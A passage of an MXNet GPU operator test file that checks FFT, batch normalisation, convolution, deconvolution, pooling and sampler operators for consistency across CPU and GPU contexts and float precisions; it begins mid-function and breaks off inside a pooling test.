out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0],rtol=1e-3, atol=1e-6)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[1],rtol=1e-3, atol=1e-8)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[3],rtol=1e-3, atol=1e-6)
@with_seed(0)
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
@with_seed()
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
#
# # V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list))
@with_seed()
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
@with_seed()
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list)
@with_seed()
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/7645")
@with_seed(1234)
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear")
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
# Checking max pooling consistency over the data sets of different float types is problematic
# as one max value in a float32 data set may not be the max value in a float16 data set.
# This function will not be called.
@with_seed(1234)
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
# this is unstable
# sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
# check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@with_seed()
def test_pooling_versions():
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False):
ctx_list = []
sym_list = []
# PoolingV1 cpu
if 'pool_v1_cpu' in pool_op_list:
